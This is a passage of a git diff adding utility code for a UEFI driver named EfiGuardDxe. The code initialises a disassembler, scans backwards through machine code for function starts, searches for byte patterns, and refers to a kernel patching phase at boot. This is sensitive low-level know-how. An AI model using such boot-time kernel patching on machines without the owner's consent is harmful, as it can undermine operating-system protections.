+ IMAGE64(NtHeaders) ? ZYDIS_MACHINE_MODE_LONG_64 : ZYDIS_MACHINE_MODE_LONG_COMPAT_32,
+ IMAGE64(NtHeaders) ? ZYDIS_ADDRESS_WIDTH_64 : ZYDIS_ADDRESS_WIDTH_32))))
+ return Status;
+
+#ifdef ZYDIS_DISABLE_FORMATTER
+ ASSERT(Formatter == NULL);
+#else
+ if (!ZYAN_SUCCESS((Status = ZydisFormatterInit(Formatter, ZYDIS_FORMATTER_STYLE_INTEL))))
+ return Status;
+ if (!ZYAN_SUCCESS((Status = ZydisFormatterSetProperty(Formatter, ZYDIS_FORMATTER_PROP_FORCE_SIZE, ZYAN_TRUE))))
+ return Status;
+
+ DefaultInstructionFormatter = (ZydisFormatterFunc)&ZydisInstructionBytesFormatter;
+ if (!ZYAN_SUCCESS((Status = ZydisFormatterSetHook(Formatter,
+ ZYDIS_FORMATTER_FUNC_FORMAT_INSTRUCTION,
+ (CONST VOID**)&DefaultInstructionFormatter))))
+ return Status;
+#endif
+
+ return ZYAN_STATUS_SUCCESS;
+}
+
+UINT8*
+EFIAPI
+BacktrackToFunctionStart(
+ IN CONST UINT8* StartAddress,
+ IN CONST UINT8* LowerBound
+ )
+{
+ // Test for null. This allows callers to do 'FindPattern(..., &Address); X = Backtrack(Address, ...)' with a single failure branch
+ if (StartAddress == NULL)
+ return NULL;
+
+ ASSERT(StartAddress > LowerBound);
+
+ UINT8 *Address;
+ BOOLEAN Found = FALSE;
+ for (Address = (UINT8*)StartAddress; Address >= LowerBound; --Address)
+ {
+ if ((*(Address - 1) == 0xCC || // Previous byte is int 3 padding, or
+ (*(Address - 2) == 0x90 && *(Address - 1) == 0x90) || // Previous 2 bytes are nop padding, or
+ (*(Address - 4) == 0x00 && *(Address - 3) == 0x00 && // Previous 4+ bytes are 00 padding (rare, only happens at start of a section), or
+ *(Address - 2) == 0x00 && *(Address - 1) == 0x00) ||
+ (*(Address - 1) == 0xC3 && *(Address - 3) != 0x8D) // Previous byte is 'ret', or
+#if defined(MDE_CPU_IA32) || defined(_M_IX86)
+ || (*(Address - 3) == 0xC2 && *(Address - 1) == 0x00) // Previous 3 bytes are 'ret XX' (x86)
+#endif
+ )
+ && // *and*
+ (*Address == 0x40 || *Address == 0x55 || // Current byte is either 'push [ebp|ebx|rbp|rbx]', 'mov REG, XX' or 'sub REG, XX'
+ (Address < StartAddress && *Address == 0x44 && *(Address + 1) == 0x89) ||
+ (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x83) ||
+ (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x89) ||
+ (Address < StartAddress && *Address == 0x48 && *(Address + 1) == 0x8B) ||
+ (Address < StartAddress && *Address == 0x49 && *(Address + 1) == 0x89) ||
+ (Address < StartAddress && *Address == 0x4C && *(Address + 1) == 0x8B)))
+ {
+ Found = TRUE;
+ break;
+ }
+ }
+
+ return Found ? Address : NULL;
+}
diff --git a/EfiGuardDxe/util.h b/EfiGuardDxe/util.h
new file mode 100644
index 0000000..b42766d
--- /dev/null
+++ b/EfiGuardDxe/util.h
@@ -0,0 +1,120 @@
+#pragma once
+
+#include "EfiGuardDxe.h"
+
+#include <Protocol/LoadedImage.h>
+
+//
+// Stalls CPU for N milliseconds
+//
+EFI_STATUS
+EFIAPI
+RtlSleep(
+ IN UINTN Milliseconds
+ );
+
+//
+// Prints info about a loaded image
+//
+VOID
+EFIAPI
+PrintLoadedImageInfo(
+ IN EFI_LOADED_IMAGE *ImageInfo
+ );
+
+//
+// Similar to Print(), but for use during the kernel patching phase.
+// Do not call this unless the message is specifically intended for (delayed) display output only.
+// Instead use the PRINT_KERNEL_PATCH_MSG() macro so the boot debugger receives messages with no delay.
+//
+VOID
+EFIAPI
+AppendKernelPatchMessage(
+ IN CONST CHAR16 *Format,
+ ...
+ );
+
+//
+// Prints the contents of the kernel patch string buffer to the screen using OutputString() calls.
+// This is a separate function because the buffer consists of zero or more null-terminated strings,
+// which are printed sequentially to prevent issues with platforms that have small Print() buffer limits
+//
+VOID
+EFIAPI
+PrintKernelPatchInfo(
+ );
+
+//
+// Waits for a key to be pressed before continuing execution.
+// Returns FALSE if ESC was pressed to abort, TRUE otherwise.
+//
+BOOLEAN
+EFIAPI
+WaitForKey(
+ );
+
+//
+// Sets the foreground colour while preserving the background colour and optionally clears the screen.
+// Returns the original console mode attribute.
+//
+INT32
+EFIAPI
+SetConsoleTextColour(
+ IN UINTN TextColour,
+ IN BOOLEAN ClearScreen
+ );
+
+//
+// Finds a byte pattern starting at the specified address
+//
+EFI_STATUS
+EFIAPI
+FindPattern(
+ IN CONST UINT8* Pattern,
+ IN UINT8 Wildcard,
+ IN UINT32 PatternLength,
+ IN VOID* Base,
+ IN UINT32 Size,
+ OUT VOID **Found
+ );
+
+//
+// Finds a byte pattern starting at the specified address (with lots of debug spew)
+//
+EFI_STATUS
+EFIAPI
+FindPatternVerbose(
+ IN CONST UINT8* Pattern,
+ IN UINT8 Wildcard,
+ IN UINT32 PatternLength,
+ IN VOID* Base,
+ IN UINT32 Size,
+ OUT VOID **Found
+ );
+
+typedef struct ZydisFormatter_ ZydisFormatter;
+
+//
+// Initializes a ZydisDecoder instance.
+// If ZYDIS_DISABLE_FORMATTER is defined, Formatter must be NULL.
+// Otherwise it is a required argument.
+//
+ZyanStatus
+EFIAPI
+ZydisInit(
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ OUT ZydisDecoder *Decoder,
+ OUT ZydisFormatter *Formatter OPTIONAL
+ );
+
+//
+// Finds the start of a function given an address within it, scanning downwards.
+// Returns NULL if StartAddress is NULL (this simplifies error checking logic in calling functions).
+// Returns NULL is LowerBound is reached and no function boundary was found.
+//
+UINT8*
+EFIAPI
+BacktrackToFunctionStart(
+ IN CONST UINT8* StartAddress,
+ IN CONST UINT8* LowerBound
+ );